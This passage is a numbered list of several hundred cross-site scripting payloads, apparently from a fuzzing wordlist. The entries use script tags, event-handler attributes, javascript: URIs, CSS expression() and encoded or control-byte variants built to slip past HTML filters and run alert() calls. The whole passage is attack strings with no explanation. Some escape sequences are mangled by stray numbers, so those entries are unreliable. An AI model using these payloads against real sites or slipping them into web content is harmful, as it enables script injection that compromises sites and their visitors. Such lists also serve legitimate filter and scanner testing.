  815. \";alert(1128);//
  816. </script><script>alert(1129);</script>
  817. </TITLE><SCRIPT>alert(1130);</SCRIPT>
  818. <INPUT TYPE="IMAGE" SRC="javascript:alert(1131);">
  819. <BODY BACKGROUND="javascript:alert(1132)">
  820. <IMG DYNSRC="javascript:alert(1133)">
  821. <IMG LOWSRC="javascript:alert(1134)">
  822. <STYLE>li {list-style-image: url("javascript:alert(1135)");}</STYLE><UL><LI>XSS</br>
  823. <BODY ONLOAD=alert(1138)>
  824. <BGSOUND SRC="javascript:alert(1139);">
  825. <BR SIZE="&{alert(1140)}">
  826. <LINK REL="stylesheet" HREF="javascript:alert(1141);">
  827. <STYLE>@im\port'\ja\vasc\ript:alert(1146)';</STYLE>
  828. <IMG STYLE="xss:expr/*XSS*/ession(alert(1147))">
  829. xss:ex/*XSS*//*/*/pression(alert(1149))'>
  830. <STYLE TYPE="text/javascript">alert(1150);</STYLE>
  831. <STYLE>.XSS{background-image:url("javascript:alert(1151)");}</STYLE><A CLASS=XSS></A>
  832. <STYLE type="text/css">BODY{background:url("javascript:alert(1152)")}</STYLE>
  833. <XSS STYLE="xss:expression(alert(1153))">
  834. ¼script¾alert(1155)¼/script¾
  835. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1156);">
  836. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1158);">
  837. <IFRAME SRC="javascript:alert(1159);"></IFRAME>
  838. <IFRAME SRC=# onmouseover="alert(1160)"></IFRAME>
  839. <FRAMESET><FRAME SRC="javascript:alert(1161);"></FRAMESET>
  840. <TABLE BACKGROUND="javascript:alert(1162)">
  841. <TABLE><TD BACKGROUND="javascript:alert(1163)">
  842. <DIV STYLE="background-image: url(javascript:alert(1164))">
  843. <DIV STYLE="background-image: url(&#1;javascript:alert(1166))">
  844. <DIV STYLE="width: expression(alert(1167));">
  845. <!--[if gte IE 4]><SCRIPT>alert(1168);</SCRIPT><![endif]-->
  846. <BASE HREF="javascript:alert(1169);//">
  847. <? echo('<SCR)';echo('IPT>alert(1172)</SCRIPT>'); ?>
  848. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1174)</SCRIPT>">
  849. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1175);+ADw-/SCRIPT+AD4-
  850. 0\"autofocus/onfocus=alert(1184)--><video/poster/ error=prompt(2)>"-confirm(3)-"
  851. veris-->group<svg/onload=alert(1185)//
  852. #"><img src=M onerror=alert(1186);>
  853. element[attribute='<img src=x onerror=alert(1187);>
  854. [<blockquote cite="]">[" onmouseover="alert(1188);" ]
  855. <scr<script>ipt>alert(1195)</scr</script>ipt><scr<script>ipt>alert(1195)</scr</script>ipt>
  856. <sCR<script>iPt>alert(1196)</SCr</script>IPt>
  857. %253Cscript%253Ealert(1198)%253C%252Fscript%253E
  858. <IMG SRC=x onload="alert(1199))">
  859. <IMG SRC=x onafterprint="alert(1200))">
  860. <IMG SRC=x onbeforeprint="alert(1201))">
  861. <IMG SRC=x onbeforeunload="alert(1202))">
  862. <IMG SRC=x onerror="alert(1203))">
  863. <IMG SRC=x onhashchange="alert(1204))">
  864. <IMG SRC=x onload="alert(1205))">
  865. <IMG SRC=x onmessage="alert(1206))">
  866. <IMG SRC=x ononline="alert(1207))">
  867. <IMG SRC=x onoffline="alert(1208))">
  868. <IMG SRC=x onpagehide="alert(1209))">
  869. <IMG SRC=x onpageshow="alert(1210))">
  870. <IMG SRC=x onpopstate="alert(1211))">
  871. <IMG SRC=x onresize="alert(1212))">
  872. <IMG SRC=x onstorage="alert(1213))">
  873. <IMG SRC=x onunload="alert(1214))">
  874. <IMG SRC=x onblur="alert(1215))">
  875. <IMG SRC=x onchange="alert(1216))">
  876. <IMG SRC=x oncontextmenu="alert(1217))">
  877. <IMG SRC=x oninput="alert(1218))">
  878. <IMG SRC=x oninvalid="alert(1219))">
  879. <IMG SRC=x onreset="alert(1220))">
  880. <IMG SRC=x onsearch="alert(1221))">
  881. <IMG SRC=x onselect="alert(1222))">
  882. <IMG SRC=x onsubmit="alert(1223))">
  883. <IMG SRC=x onkeydown="alert(1224))">
  884. <IMG SRC=x onkeypress="alert(1225))">
  885. <IMG SRC=x onkeyup="alert(1226))">
  886. <IMG SRC=x onclick="alert(1227))">
  887. <IMG SRC=x ondblclick="alert(1228))">
  888. <IMG SRC=x onmousedown="alert(1229))">
  889. <IMG SRC=x onmousemove="alert(1230))">
  890. <IMG SRC=x onmouseout="alert(1231))">
  891. <IMG SRC=x onmouseover="alert(1232))">
  892. <IMG SRC=x onmouseup="alert(1233))">
  893. <IMG SRC=x onmousewheel="alert(1234))">
  894. <IMG SRC=x onwheel="alert(1235))">
  895. <IMG SRC=x ondrag="alert(1236))">
  896. <IMG SRC=x ondragend="alert(1237))">
  897. <IMG SRC=x ondragenter="alert(1238))">
  898. <IMG SRC=x ondragleave="alert(1239))">
  899. <IMG SRC=x ondragover="alert(1240))">
  900. <IMG SRC=x ondragstart="alert(1241))">
  901. <IMG SRC=x ondrop="alert(1242))">
  902. <IMG SRC=x onscroll="alert(1243))">
  903. <IMG SRC=x oncopy="alert(1244))">
  904. <IMG SRC=x oncut="alert(1245))">
  905. <IMG SRC=x onpaste="alert(1246))">
  906. <IMG SRC=x onabort="alert(1247))">
  907. <IMG SRC=x oncanplay="alert(1248))">
  908. <IMG SRC=x oncanplaythrough="alert(1249))">
  909. <IMG SRC=x oncuechange="alert(1250))">
  910. <IMG SRC=x ondurationchange="alert(1251))">
  911. <IMG SRC=x onemptied="alert(1252))">
  912. <IMG SRC=x onended="alert(1253))">
  913. <IMG SRC=x onerror="alert(1254))">
  914. <IMG SRC=x onloadeddata="alert(1255))">
  915. <IMG SRC=x onloadedmetadata="alert(1256))">
  916. <IMG SRC=x onloadstart="alert(1257))">
  917. <IMG SRC=x onpause="alert(1258))">
  918. <IMG SRC=x onplay="alert(1259))">
  919. <IMG SRC=x onplaying="alert(1260))">
  920. <IMG SRC=x onprogress="alert(1261))">
  921. <IMG SRC=x onratechange="alert(1262))">
  922. <IMG SRC=x onseeked="alert(1263))">
  923. <IMG SRC=x onseeking="alert(1264))">
  924. <IMG SRC=x onstalled="alert(1265))">
  925. <IMG SRC=x onsuspend="alert(1266))">
  926. <IMG SRC=x ontimeupdate="alert(1267))">
  927. <IMG SRC=x onvolumechange="alert(1268))">
  928. <IMG SRC=x onwaiting="alert(1269))">
  929. <IMG SRC=x onshow="alert(1270))">
  930. <IMG SRC=x ontoggle="alert(1271))">
  931. <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1272)";
  932. <IMG SRC=x onload="alert(1273))">
  933. <INPUT TYPE="BUTTON" action="alert(1274)"/>
  934. "><h1><IFRAME SRC="javascript:alert(1275);"></IFRAME>">123</h1>
  935. "><h1><IFRAME SRC=# onmouseover="alert(1276)"></IFRAME>123</h1>
  936. <IFRAME SRC="javascript:alert(1277);"></IFRAME>
  937. <IFRAME SRC=# onmouseover="alert(1278)"></IFRAME>
  938. "><h1><IFRAME SRC=# onmouseover="alert(1279)"></IFRAME>123</h1>
  939. "></iframe><script>alert(1280);</script><iframe frameborder="0%EF%BB%BF
  940. "><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(1281)"></IFRAME>123</h1>
  941. <IFRAME width="420" height="315" frameborder="0" onload="alert(1285)"></IFRAME>
  942. "><h1><IFRAME SRC="javascript:alert(1286);"></IFRAME>">123</h1>
  943. "><h1><IFRAME SRC=# onmouseover="alert(1287)"></IFRAME>123</h1>
  944. <IFRAME SRC="javascript:alert(1289);"></IFRAME>
  945. <IFRAME SRC=# onmouseover="alert(1290)"></IFRAME>
  946. <img src=``&NewLine; onerror=alert(1297)&NewLine;
  947. <script /**/>/**/alert(1301)/**/</script /**/
  948. <iframe/src="data:text/html,<svg &#130313031303;&#130313030;load=alert(1303)>">
  949. <meta content="&NewLine; 1304 &NewLine;; JAVASCRIPT&colon; alert(1304)" http-equiv="refresh"/>
  950. <form><iframe         ㌶&#13111311; src="javascript:alert(1311)"&#13111311;㌶        ;>
  951. http://www.google<script .com>alert(1313)</script
  952. <script ^__^>alert(1317))</script ^__^
  953. </style  ><script   :-(>/**/alert(1318)/**/</script   :-(
  954. &#00;</form><input type"date" onfocus="alert(1319)">
  955. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1323)&NewLine;>X</a>
  956. <script ~~~>alert(1324)</script ~~~>
  957. <iframe// src=javaSCRIPT&colon;alert(1332)
  958. <%<!--'%><script>alert(1349);</script -->
  959. <script src="data:text/javascript,alert(1350)"></script>
  960. <iframe/onreadystatechange=alert(1352)
  961. <svg/onload=alert(1353)
  962. <input type="text" value=`` <div/onmouseover='alert(1355)'>X</div>
  963. http://www.<script>alert(1356)</script .com
  964. <svg><script ?>alert(1358)
  965. <img src=`xx:xx`onerror=alert(1360)>
  966. <meta http-equiv="refresh" content="0;javascript&colon;alert(1362)"/>
  967. <script>+-+-1372-+-+alert(1372)</script>
  968. <body/onload=<!-->&#13730alert(1373)>
  969. <script itworksinallbrowsers>/*<script* */alert(1374)</script
  970. <img src ?itworksonchrome?\/onerror = alert(1375)
  971. <svg><script onlypossibleinopera:-)> alert(1377)
  972. <script x> alert(1379) </script 1379=2
  973. <div/onmouseover='alert(1380)'> style="x:">
  974. <--`<img/src=` onerror=alert(1381)> --!>
  975. <div style="position:absolute;top:0;left:0;width:138300%;height:138300%" onmouseover="prompt(1383)" onclick="alert(1383)">x</button>
  976. <form><button formaction=javascript&colon;alert(1385)>CLICKME
  977. <script\x20type="text/javascript">javascript:alert(1390);</script>
  978. <script\x3Etype="text/javascript">javascript:alert(1391);</script>
  979. <script\x0Dtype="text/javascript">javascript:alert(1392);</script>
  980. <script\x09type="text/javascript">javascript:alert(1393);</script>
  981. <script\x0Ctype="text/javascript">javascript:alert(1394);</script>
  982. <script\x2Ftype="text/javascript">javascript:alert(1395);</script>
  983. <script\x0Atype="text/javascript">javascript:alert(1396);</script>
  984. '`"><\x3Cscript>javascript:alert(1397)</script>
  985. '`"><\x00script>javascript:alert(1398)</script>
  986. <img src=1399 href=1399 onerror="javascript:alert(1399)"></img>
  987. <audio src=1400 href=1400 onerror="javascript:alert(1400)"></audio>
  988. <video src=1401 href=1401 onerror="javascript:alert(1401)"></video>
  989. <body src=1402 href=1402 onerror="javascript:alert(1402)"></body>
  990. <image src=1403 href=1403 onerror="javascript:alert(1403)"></image>
  991. <object src=1404 href=1404 onerror="javascript:alert(1404)"></object>
  992. <script src=1405 href=1405 onerror="javascript:alert(1405)"></script>
  993. <svg onResize svg onResize="javascript:javascript:alert(1406)"></svg onResize>
  994. <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1407)"></title onPropertyChange>
  995. <iframe onLoad iframe onLoad="javascript:javascript:alert(1408)"></iframe onLoad>
  996. <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1409)"></body onMouseEnter>
  997. <body onFocus body onFocus="javascript:javascript:alert(1410)"></body onFocus>
  998. <frameset onScroll frameset onScroll="javascript:javascript:alert(1411)"></frameset onScroll>
  999. <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1412)"></script onReadyStateChange>
  1000. <html onMouseUp html onMouseUp="javascript:javascript:alert(1413)"></html onMouseUp>
  1001. <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1414)"></body onPropertyChange>
  1002. <svg onLoad svg onLoad="javascript:javascript:alert(1415)"></svg onLoad>
  1003. <body onPageHide body onPageHide="javascript:javascript:alert(1416)"></body onPageHide>
  1004. <body onMouseOver body onMouseOver="javascript:javascript:alert(1417)"></body onMouseOver>
  1005. <body onUnload body onUnload="javascript:javascript:alert(1418)"></body onUnload>
  1006. <body onLoad body onLoad="javascript:javascript:alert(1419)"></body onLoad>
  1007. <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1420)"></bgsound onPropertyChange>
  1008. <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1421)"></html onMouseLeave>
  1009. <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1422)"></html onMouseWheel>
  1010. <style onLoad style onLoad="javascript:javascript:alert(1423)"></style onLoad>
  1011. <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1424)"></iframe onReadyStateChange>
  1012. <body onPageShow body onPageShow="javascript:javascript:alert(1425)"></body onPageShow>
  1013. <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1426)"></style onReadyStateChange>
  1014. <frameset onFocus frameset onFocus="javascript:javascript:alert(1427)"></frameset onFocus>
  1015. <applet onError applet onError="javascript:javascript:alert(1428)"></applet onError>
  1016. <marquee onStart marquee onStart="javascript:javascript:alert(1429)"></marquee onStart>
  1017. <script onLoad script onLoad="javascript:javascript:alert(1430)"></script onLoad>
  1018. <html onMouseOver html onMouseOver="javascript:javascript:alert(1431)"></html onMouseOver>
  1019. <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1432)"></html onMouseEnter>
  1020. <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1433)"></body onBeforeUnload>
  1021. <html onMouseDown html onMouseDown="javascript:javascript:alert(1434)"></html onMouseDown>
  1022. <marquee onScroll marquee onScroll="javascript:javascript:alert(1435)"></marquee onScroll>
  1023. <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1436)"></xml onPropertyChange>
  1024. <frameset onBlur frameset onBlur="javascript:javascript:alert(1437)"></frameset onBlur>
  1025. <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1438)"></applet onReadyStateChange>
  1026. <svg onUnload svg onUnload="javascript:javascript:alert(1439)"></svg onUnload>
  1027. <html onMouseOut html onMouseOut="javascript:javascript:alert(1440)"></html onMouseOut>
  1028. <body onMouseMove body onMouseMove="javascript:javascript:alert(1441)"></body onMouseMove>
  1029. <body onResize body onResize="javascript:javascript:alert(1442)"></body onResize>
  1030. <object onError object onError="javascript:javascript:alert(1443)"></object onError>
  1031. <body onPopState body onPopState="javascript:javascript:alert(1444)"></body onPopState>
  1032. <html onMouseMove html onMouseMove="javascript:javascript:alert(1445)"></html onMouseMove>
  1033. <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1446)"></applet onreadystatechange>
  1034. <body onpagehide body onpagehide="javascript:javascript:alert(1447)"></body onpagehide>
  1035. <svg onunload svg onunload="javascript:javascript:alert(1448)"></svg onunload>
  1036. <applet onerror applet onerror="javascript:javascript:alert(1449)"></applet onerror>
  1037. <body onkeyup body onkeyup="javascript:javascript:alert(1450)"></body onkeyup>
  1038. <body onunload body onunload="javascript:javascript:alert(1451)"></body onunload>
  1039. <iframe onload iframe onload="javascript:javascript:alert(1452)"></iframe onload>
  1040. <body onload body onload="javascript:javascript:alert(1453)"></body onload>
  1041. <html onmouseover html onmouseover="javascript:javascript:alert(1454)"></html onmouseover>
  1042. <object onbeforeload object onbeforeload="javascript:javascript:alert(1455)"></object onbeforeload>
  1043. <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1456)"></body onbeforeunload>
  1044. <body onfocus body onfocus="javascript:javascript:alert(1457)"></body onfocus>
  1045. <body onkeydown body onkeydown="javascript:javascript:alert(1458)"></body onkeydown>
  1046. <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1459)"></iframe onbeforeload>
  1047. <iframe src iframe src="javascript:javascript:alert(1460)"></iframe src>
  1048. <svg onload svg onload="javascript:javascript:alert(1461)"></svg onload>
  1049. <html onmousemove html onmousemove="javascript:javascript:alert(1462)"></html onmousemove>
  1050. <body onblur body onblur="javascript:javascript:alert(1463)"></body onblur>
  1051. \x3Cscript>javascript:alert(1464)</script>
  1052. '"`><script>/* *\x2Fjavascript:alert(1465)// */</script>
  1053. <script>javascript:alert(1466)</script\x0D
  1054. <script>javascript:alert(1467)</script\x0A
  1055. <script>javascript:alert(1468)</script\x0B
  1056. <script charset="\x22>javascript:alert(1469)</script>
  1057. <!--\x3E<img src=xxx:x onerror=javascript:alert(1470)> -->
  1058. --><!-- ---> <img src=xxx:x onerror=javascript:alert(1471)> -->
  1059. --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1472)> -->
  1060. --><!-- --\x21473> <img src=xxx:x onerror=javascript:alert(1473)> -->
  1061. --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1474)> -->
  1062. `"'><img src='#\x27 onerror=javascript:alert(1475)>
  1063. <a href="javascript\x3Ajavascript:alert(1476)" id="fuzzelement1476">test</a>
  1064. "'`><p><svg><script>a='hello\x27;javascript:alert(1477)//';</script></p>
  1065. <a href="javas\x00cript:javascript:alert(1478)" id="fuzzelement1478">test</a>
  1066. <a href="javas\x07cript:javascript:alert(1479)" id="fuzzelement1479">test</a>
  1067. <a href="javas\x0Dcript:javascript:alert(1480)" id="fuzzelement1480">test</a>
  1068. <a href="javas\x0Acript:javascript:alert(1481)" id="fuzzelement1481">test</a>
  1069. <a href="javas\x08cript:javascript:alert(1482)" id="fuzzelement1482">test</a>
  1070. <a href="javas\x02cript:javascript:alert(1483)" id="fuzzelement1483">test</a>
  1071. <a href="javas\x03cript:javascript:alert(1484)" id="fuzzelement1484">test</a>
  1072. <a href="javas\x04cript:javascript:alert(1485)" id="fuzzelement1485">test</a>
  1073. <a href="javas\x01486cript:javascript:alert(1486)" id="fuzzelement1486">test</a>
  1074. <a href="javas\x05cript:javascript:alert(1487)" id="fuzzelement1487">test</a>
  1075. <a href="javas\x0Bcript:javascript:alert(1488)" id="fuzzelement1488">test</a>
  1076. <a href="javas\x09cript:javascript:alert(1489)" id="fuzzelement1489">test</a>
  1077. <a href="javas\x06cript:javascript:alert(1490)" id="fuzzelement1490">test</a>
  1078. <a href="javas\x0Ccript:javascript:alert(1491)" id="fuzzelement1491">test</a>
  1079. <script>/* *\x2A/javascript:alert(1492)// */</script>
  1080. <script>/* *\x00/javascript:alert(1493)// */</script>
  1081. <style></style\x3E<img src="about:blank" onerror=javascript:alert(1494)//></style>
  1082. <style></style\x0D<img src="about:blank" onerror=javascript:alert(1495)//></style>
  1083. <style></style\x09<img src="about:blank" onerror=javascript:alert(1496)//></style>
  1084. <style></style\x20<img src="about:blank" onerror=javascript:alert(1497)//></style>
  1085. <style></style\x0A<img src="about:blank" onerror=javascript:alert(1498)//></style>
  1086. "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1499);/*';">DEF
  1087. "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1500);/*';">DEF
  1088. <script>if("x\\xE1501\x96\x89".length==2) { javascript:alert(1501);}</script>
  1089. <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1502);}</script>
  1090. <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1503);}</script>
  1091. '`"><\x3Cscript>javascript:alert(1504)</script>
  1092. '`"><\x00script>javascript:alert(1505)</script>
  1093. "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1506)>
  1094. "'`><\x00img src=xxx:x onerror=javascript:alert(1507)>
  1095. <script src="data:text/plain\x2Cjavascript:alert(1508)"></script>
  1096. <script src="data:\xD4\x8F,javascript:alert(1509)"></script>
  1097. <script src="data:\xE0\xA4\x98,javascript:alert(1510)"></script>
  1098. <script src="data:\xCB\x8F,javascript:alert(1511)"></script>
  1099. <script\x20type="text/javascript">javascript:alert(1512);</script>
  1100. <script\x3Etype="text/javascript">javascript:alert(1513);</script>
  1101. <script\x0Dtype="text/javascript">javascript:alert(1514);</script>
  1102. <script\x09type="text/javascript">javascript:alert(1515);</script>
  1103. <script\x0Ctype="text/javascript">javascript:alert(1516);</script>
  1104. <script\x2Ftype="text/javascript">javascript:alert(1517);</script>
  1105. <script\x0Atype="text/javascript">javascript:alert(1518);</script>
  1106. ABC<div style="x\x3Aexpression(javascript:alert(1519)">DEF
  1107. ABC<div style="x:expression\x5C(javascript:alert(1520)">DEF
  1108. ABC<div style="x:expression\x00(javascript:alert(1521)">DEF
  1109. ABC<div style="x:exp\x00ression(javascript:alert(1522)">DEF
  1110. ABC<div style="x:exp\x5Cression(javascript:alert(1523)">DEF
  1111. ABC<div style="x:\x0Aexpression(javascript:alert(1524)">DEF
  1112. ABC<div style="x:\x09expression(javascript:alert(1525)">DEF
  1113. ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1526)">DEF
  1114. ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1527)">DEF
  1115. ABC<div style="x:\xC2\xA0expression(javascript:alert(1528)">DEF
  1116. ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1529)">DEF
  1117. ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1530)">DEF
  1118. ABC<div style="x:\x0Dexpression(javascript:alert(1531)">DEF
  1119. ABC<div style="x:\x0Cexpression(javascript:alert(1532)">DEF
  1120. ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1533)">DEF
  1121. ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1534)">DEF
  1122. ABC<div style="x:\x20expression(javascript:alert(1535)">DEF
  1123. ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1536)">DEF
  1124. ABC<div style="x:\x00expression(javascript:alert(1537)">DEF
  1125. ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1538)">DEF
  1126. ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1539)">DEF
  1127. ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1540)">DEF
  1128. ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1541)">DEF
  1129. ABC<div style="x:\x0Bexpression(javascript:alert(1542)">DEF
  1130. ABC<div style="x:\xE2\x80\x81543expression(javascript:alert(1543)">DEF
  1131. ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1544)">DEF
  1132. ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1545)">DEF
  1133. <a href="\x0Bjavascript:javascript:alert(1546)" id="fuzzelement1546">test</a>
  1134. <a href="\x0Fjavascript:javascript:alert(1547)" id="fuzzelement1547">test</a>
  1135. <a href="\xC2\xA0javascript:javascript:alert(1548)" id="fuzzelement1548">test</a>
  1136. <a href="\x05javascript:javascript:alert(1549)" id="fuzzelement1549">test</a>
  1137. <a href="\xE1550\xA0\x8Ejavascript:javascript:alert(1550)" id="fuzzelement1550">test</a>
  1138. <a href="\x15518javascript:javascript:alert(1551)" id="fuzzelement1551">test</a>
  1139. <a href="\x15521552javascript:javascript:alert(1552)" id="fuzzelement1552">test</a>
  1140. <a href="\xE2\x80\x88javascript:javascript:alert(1553)" id="fuzzelement1553">test</a>
  1141. <a href="\xE2\x80\x89javascript:javascript:alert(1554)" id="fuzzelement1554">test</a>
  1142. <a href="\xE2\x80\x80javascript:javascript:alert(1555)" id="fuzzelement1555">test</a>
  1143. <a href="\x15567javascript:javascript:alert(1556)" id="fuzzelement1556">test</a>
  1144. <a href="\x03javascript:javascript:alert(1557)" id="fuzzelement1557">test</a>
  1145. <a href="\x0Ejavascript:javascript:alert(1558)" id="fuzzelement1558">test</a>
  1146. <a href="\x1559Ajavascript:javascript:alert(1559)" id="fuzzelement1559">test</a>
  1147. <a href="\x00javascript:javascript:alert(1560)" id="fuzzelement1560">test</a>
  1148. <a href="\x15610javascript:javascript:alert(1561)" id="fuzzelement1561">test</a>
  1149. <a href="\xE2\x80\x82javascript:javascript:alert(1562)" id="fuzzelement1562">test</a>
  1150. <a href="\x20javascript:javascript:alert(1563)" id="fuzzelement1563">test</a>
  1151. <a href="\x15643javascript:javascript:alert(1564)" id="fuzzelement1564">test</a>
  1152. <a href="\x09javascript:javascript:alert(1565)" id="fuzzelement1565">test</a>
  1153. <a href="\xE2\x80\x8Ajavascript:javascript:alert(1566)" id="fuzzelement1566">test</a>
  1154. <a href="\x15674javascript:javascript:alert(1567)" id="fuzzelement1567">test</a>
  1155. <a href="\x15689javascript:javascript:alert(1568)" id="fuzzelement1568">test</a>
  1156. <a href="\xE2\x80\xAFjavascript:javascript:alert(1569)" id="fuzzelement1569">test</a>
  1157. <a href="\x1570Fjavascript:javascript:alert(1570)" id="fuzzelement1570">test</a>
  1158. <a href="\xE2\x80\x81571javascript:javascript:alert(1571)" id="fuzzelement1571">test</a>
  1159. <a href="\x1572Djavascript:javascript:alert(1572)" id="fuzzelement1572">test</a>
  1160. <a href="\xE2\x80\x87javascript:javascript:alert(1573)" id="fuzzelement1573">test</a>
  1161. <a href="\x07javascript:javascript:alert(1574)" id="fuzzelement1574">test</a>
  1162. <a href="\xE1575\x9A\x80javascript:javascript:alert(1575)" id="fuzzelement1575">test</a>
  1163. <a href="\xE2\x80\x83javascript:javascript:alert(1576)" id="fuzzelement1576">test</a>
  1164. <a href="\x04javascript:javascript:alert(1577)" id="fuzzelement1577">test</a>
  1165. <a href="\x01578javascript:javascript:alert(1578)" id="fuzzelement1578">test</a>
  1166. <a href="\x08javascript:javascript:alert(1579)" id="fuzzelement1579">test</a>
  1167. <a href="\xE2\x80\x84javascript:javascript:alert(1580)" id="fuzzelement1580">test</a>
  1168. <a href="\xE2\x80\x86javascript:javascript:alert(1581)" id="fuzzelement1581">test</a>
  1169. <a href="\xE3\x80\x80javascript:javascript:alert(1582)" id="fuzzelement1582">test</a>
  1170. <a href="\x15832javascript:javascript:alert(1583)" id="fuzzelement1583">test</a>
  1171. <a href="\x0Djavascript:javascript:alert(1584)" id="fuzzelement1584">test</a>
  1172. <a href="\x0Ajavascript:javascript:alert(1585)" id="fuzzelement1585">test</a>
  1173. <a href="\x0Cjavascript:javascript:alert(1586)" id="fuzzelement1586">test</a>
  1174. <a href="\x15875javascript:javascript:alert(1587)" id="fuzzelement1587">test</a>
  1175. <a href="\xE2\x80\xA8javascript:javascript:alert(1588)" id="fuzzelement1588">test</a>
  1176. <a href="\x15896javascript:javascript:alert(1589)" id="fuzzelement1589">test</a>
  1177. <a href="\x02javascript:javascript:alert(1590)" id="fuzzelement1590">test</a>
  1178. <a href="\x1591Bjavascript:javascript:alert(1591)" id="fuzzelement1591">test</a>
  1179. <a href="\x06javascript:javascript:alert(1592)" id="fuzzelement1592">test</a>
  1180. <a href="\xE2\x80\xA9javascript:javascript:alert(1593)" id="fuzzelement1593">test</a>
  1181. <a href="\xE2\x80\x85javascript:javascript:alert(1594)" id="fuzzelement1594">test</a>
  1182. <a href="\x1595Ejavascript:javascript:alert(1595)" id="fuzzelement1595">test</a>
  1183. <a href="\xE2\x81596\x9Fjavascript:javascript:alert(1596)" id="fuzzelement1596">test</a>
  1184. <a href="\x1597Cjavascript:javascript:alert(1597)" id="fuzzelement1597">test</a>
  1185. <a href="javascript\x00:javascript:alert(1598)" id="fuzzelement1598">test</a>
  1186. <a href="javascript\x3A:javascript:alert(1599)" id="fuzzelement1599">test</a>
  1187. <a href="javascript\x09:javascript:alert(1600)" id="fuzzelement1600">test</a>
  1188. <a href="javascript\x0D:javascript:alert(1601)" id="fuzzelement1601">test</a>
  1189. <a href="javascript\x0A:javascript:alert(1602)" id="fuzzelement1602">test</a>
  1190. `"'><img src=xxx:x \x0Aonerror=javascript:alert(1603)>
  1191. `"'><img src=xxx:x \x22onerror=javascript:alert(1604)>
  1192. `"'><img src=xxx:x \x0Bonerror=javascript:alert(1605)>
  1193. `"'><img src=xxx:x \x0Donerror=javascript:alert(1606)>
  1194. `"'><img src=xxx:x \x2Fonerror=javascript:alert(1607)>
  1195. `"'><img src=xxx:x \x09onerror=javascript:alert(1608)>
  1196. `"'><img src=xxx:x \x0Conerror=javascript:alert(1609)>
  1197. `"'><img src=xxx:x \x00onerror=javascript:alert(1610)>
  1198. `"'><img src=xxx:x \x27onerror=javascript:alert(1611)>
  1199. `"'><img src=xxx:x \x20onerror=javascript:alert(1612)>
  1200. "`'><script>\x3Bjavascript:alert(1613)</script>
  1201. "`'><script>\x0Djavascript:alert(1614)</script>
  1202. "`'><script>\xEF\xBB\xBFjavascript:alert(1615)</script>
  1203. "`'><script>\xE2\x80\x81616javascript:alert(1616)</script>
  1204. "`'><script>\xE2\x80\x84javascript:alert(1617)</script>
  1205. "`'><script>\xE3\x80\x80javascript:alert(1618)</script>
  1206. "`'><script>\x09javascript:alert(1619)</script>
  1207. "`'><script>\xE2\x80\x89javascript:alert(1620)</script>
  1208. "`'><script>\xE2\x80\x85javascript:alert(1621)</script>
  1209. "`'><script>\xE2\x80\x88javascript:alert(1622)</script>
  1210. "`'><script>\x00javascript:alert(1623)</script>
  1211. "`'><script>\xE2\x80\xA8javascript:alert(1624)</script>
  1212. "`'><script>\xE2\x80\x8Ajavascript:alert(1625)</script>
  1213. "`'><script>\xE1626\x9A\x80javascript:alert(1626)</script>
  1214. "`'><script>\x0Cjavascript:alert(1627)</script>
  1215. "`'><script>\x2Bjavascript:alert(1628)</script>
  1216. "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1629)</script>
  1217. "`'><script>-javascript:alert(1630)</script>
  1218. "`'><script>\x0Ajavascript:alert(1631)</script>
  1219. "`'><script>\xE2\x80\xAFjavascript:alert(1632)</script>
  1220. "`'><script>\x7Ejavascript:alert(1633)</script>
  1221. "`'><script>\xE2\x80\x87javascript:alert(1634)</script>
  1222. "`'><script>\xE2\x81635\x9Fjavascript:alert(1635)</script>
  1223. "`'><script>\xE2\x80\xA9javascript:alert(1636)</script>
  1224. "`'><script>\xC2\x85javascript:alert(1637)</script>
  1225. "`'><script>\xEF\xBF\xAEjavascript:alert(1638)</script>
  1226. "`'><script>\xE2\x80\x83javascript:alert(1639)</script>
  1227. "`'><script>\xE2\x80\x8Bjavascript:alert(1640)</script>
  1228. "`'><script>\xEF\xBF\xBEjavascript:alert(1641)</script>
